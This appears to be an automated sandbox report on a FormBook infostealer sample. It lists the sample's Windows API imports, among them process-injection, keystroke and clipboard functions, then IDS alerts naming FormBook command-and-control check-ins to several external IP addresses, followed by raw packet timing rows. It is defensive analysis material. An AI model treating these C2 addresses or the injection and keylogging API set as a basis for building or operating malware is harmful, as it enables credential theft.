KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-18T18:27:31.736327+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54153 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:25:03.084512+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54111 | 80 | 192.168.2.9 | 38.12.1.29
2024-08-18T18:27:54.136691+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54154 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:26:39.070556+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54140 | 80 | 192.168.2.9 | 216.83.33.145
2024-08-18T18:27:11.524512+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54150 | 80 | 192.168.2.9 | 76.223.67.189
2024-08-18T18:26:36.534944+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54139 | 80 | 192.168.2.9 | 216.83.33.145
2024-08-18T18:26:22.591621+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54135 | 80 | 192.168.2.9 | 203.161.55.102
2024-08-18T18:25:05.596887+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54114 | 80 | 192.168.2.9 | 38.12.1.29
2024-08-18T18:27:09.314071+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54149 | 80 | 192.168.2.9 | 76.223.67.189
2024-08-18T18:26:55.739873+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54145 | 80 | 192.168.2.9 | 35.241.42.217
2024-08-18T18:25:41.578715+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54124 | 80 | 192.168.2.9 | 109.95.158.127
2024-08-18T18:26:11.701068+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54132 | 80 | 192.168.2.9 | 64.226.69.42
2024-08-18T18:26:30.196897+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54138 | 80 | 192.168.2.9 | 203.161.55.102
2024-08-18T18:26:14.261587+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54133 | 80 | 192.168.2.9 | 64.226.69.42
2024-08-18T18:25:16.688199+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54117 | 80 | 192.168.2.9 | 217.116.0.191
2024-08-18T18:27:03.862811+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54147 | 80 | 192.168.2.9 | 76.223.67.189
2024-08-18T18:26:09.344103+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54131 | 80 | 192.168.2.9 | 64.226.69.42
2024-08-18T18:27:06.426141+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54148 | 80 | 192.168.2.9 | 76.223.67.189
2024-08-18T18:27:29.189423+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54152 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:28:01.299489+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54155 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:25:33.234377+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54122 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:24:41.453793+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54110 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:25:11.551685+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54115 | 80 | 192.168.2.9 | 217.116.0.191
2024-08-18T18:27:26.642647+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54151 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:24:57.999560+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54111 | 80 | 192.168.2.9 | 38.12.1.29
2024-08-18T18:25:44.122206+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54125 | 80 | 192.168.2.9 | 109.95.158.127
2024-08-18T18:26:58.248296+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54146 | 80 | 192.168.2.9 | 35.241.42.217
2024-08-18T18:25:46.635923+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54126 | 80 | 192.168.2.9 | 109.95.158.127
2024-08-18T18:25:52.178527+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54127 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:25:54.683042+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54128 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:25:19.127535+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54118 | 80 | 192.168.2.9 | 217.116.0.191
2024-08-18T18:25:24.703851+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54119 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:26:25.374501+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54136 | 80 | 192.168.2.9 | 203.161.55.102
2024-08-18T18:26:44.312610+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54142 | 80 | 192.168.2.9 | 216.83.33.145
2024-08-18T18:25:00.535819+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54112 | 80 | 192.168.2.9 | 38.12.1.29
2024-08-18T18:25:57.429856+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54129 | 80 | 192.168.2.9 | 3.33.130.190
2024-08-18T18:28:03.830528+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54156 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:28:07.986584+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54157 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:26:53.197381+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54144 | 80 | 192.168.2.9 | 35.241.42.217
2024-08-18T18:26:41.642626+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54141 | 80 | 192.168.2.9 | 216.83.33.145
2024-08-18T18:26:50.635506+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54143 | 80 | 192.168.2.9 | 35.241.42.217
2024-08-18T18:23:51.800190+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 54158 | 80 | 192.168.2.9 | 116.213.43.190
2024-08-18T18:26:27.651468+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54137 | 80 | 192.168.2.9 | 203.161.55.102
2024-08-18T18:25:27.276518+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 54120 | 80 | 192.168.2.9 | 3.33.130.190
                                                      2024-08-18T18:26:16.778289+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215413480192.168.2.964.226.69.42
                                                      2024-08-18T18:25:39.036607+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315412380192.168.2.9109.95.158.127
                                                      2024-08-18T18:25:14.036185+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315411680192.168.2.9217.116.0.191
                                                      2024-08-18T18:25:29.822772+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315412180192.168.2.93.33.130.190
                                                      2024-08-18T18:26:03.454517+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215413080192.168.2.93.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Aug 18, 2024 18:26:25.374469042 CEST8054136203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:25.374500990 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:25.374541044 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:26.034636021 CEST5413680192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.053045034 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.057979107 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.058053017 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.060240984 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:27.065102100 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.065500975 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651304007 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651396990 CEST8054137203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:27.651468039 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:28.573559046 CEST5413780192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.584845066 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.589844942 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:29.589956999 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.592091084 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:29.597027063 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196692944 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196715117 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:30.196897030 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:30.202904940 CEST5413880192.168.2.9203.161.55.102
                                                      Aug 18, 2024 18:26:30.211704016 CEST8054138203.161.55.102192.168.2.9
                                                      Aug 18, 2024 18:26:35.618905067 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.624000072 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:35.624130011 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.626837015 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:35.632114887 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.533597946 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.534821033 CEST8054139216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:36.534944057 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:37.126818895 CEST5413980192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.145539045 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.150511980 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:38.150595903 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.152477980 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:38.157421112 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070369005 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070461035 CEST8054140216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:39.070555925 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:39.658163071 CEST5414080192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.678090096 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.683013916 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:40.683115959 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.685551882 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:40.690392017 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:40.691701889 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.584238052 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.642626047 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:41.802833080 CEST8054141216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:41.802923918 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:42.189611912 CEST5414180192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.216531992 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.376415014 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:43.378669977 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.384511948 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:43.389389992 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.311353922 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.312532902 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:44.312609911 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:44.321141005 CEST5414280192.168.2.9216.83.33.145
                                                      Aug 18, 2024 18:26:44.326077938 CEST8054142216.83.33.145192.168.2.9
                                                      Aug 18, 2024 18:26:49.981426001 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.986340046 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:49.986649990 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.988517046 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:49.993316889 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.632245064 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.634627104 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.635505915 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:50.636929989 CEST805414335.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:50.637026072 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:51.502561092 CEST5414380192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.522236109 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.527239084 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:52.527316093 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.529439926 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:52.537013054 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.193691015 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197258949 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197381020 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:53.197634935 CEST805414435.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:53.197736025 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:54.033174992 CEST5414480192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.051989079 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.056978941 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.057187080 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.059035063 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:55.063927889 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.064085960 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.734154940 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739684105 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739806890 CEST805414535.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:55.739872932 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:56.564409971 CEST5414580192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.584523916 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.589888096 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:57.590130091 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.592564106 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:57.599262953 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.234942913 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248225927 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248235941 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248260975 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248270035 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248286009 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.248296022 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.248389006 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.249172926 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:26:58.249284029 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.252698898 CEST5414680192.168.2.935.241.42.217
                                                      Aug 18, 2024 18:26:58.257538080 CEST805414635.241.42.217192.168.2.9
                                                      Aug 18, 2024 18:27:03.364505053 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.369508982 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.372464895 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.377296925 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:03.382436991 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.862488031 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:03.862811089 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:04.892608881 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.343642950 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.806216002 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.806291103 CEST805414776.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.807148933 CEST5414780192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.950576067 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.955523968 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:05.957014084 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.989432096 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:05.994447947 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:06.426083088 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:06.426141024 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:07.501991987 CEST5414880192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:07.506834984 CEST805414876.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.522063017 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.527074099 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.527184963 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.529903889 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:08.534822941 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:08.537163973 CEST805414976.223.67.189192.168.2.9
